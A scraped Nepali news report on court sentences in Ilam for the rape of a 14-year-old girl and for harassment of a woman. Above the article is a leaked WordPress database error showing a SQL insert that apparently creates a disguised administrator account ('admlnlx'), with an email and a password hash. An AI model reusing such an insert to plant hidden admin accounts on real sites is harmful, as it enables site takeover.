WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bi/RiIaiQ3HrMaaEZDkRCS.71MMYci.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 02:39:41', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । इलाममा जबरजस्ती करणी मुद्दाका दुई जना दोषिलाई पाँच वर्ष कैद सजाय भएको छ । चौध वर्षीया किशोरीलाई बलात्कार गरेको अभियोगमा सूर्योदय नगरपालिकाका–२ का २३ वर्षीय लोकबहादुर भुजेल र वर्ष २३ कै सुमन राईलाई पाँच पाँच वर्ष कैद सजाय भएको हो ।
जिल्ला अदालतका न्यायाधीश हरिश्चन्द्र इङ्गनामको एक इजलासले दुवै जनालाई कैद सजाय सुनाएको हो । भुजेल र राईविरुद्ध २०७६ मङ्सिर १४ गते बालिकालाई जबरर्जस्ती करणीको मुद्दा दर्ता गरिएको थियो ।
यस्तै महिलामाथि अभद्र व्यवहार गरेको मुद्दामा इलाम नगरपालिका–१२ का रेशबहादुर राउतलाई आठ महिना कैद सजाय भएको छ । राउतविरुद्ध अदालतमा सार्वजनिक स्थान वा प्रवेश गर्ने कानूनी अधिकार नभएको स्थानमा प्रवेश गरी महिलालाई अभद्र व्यवहार गरेको आरोप थियो ।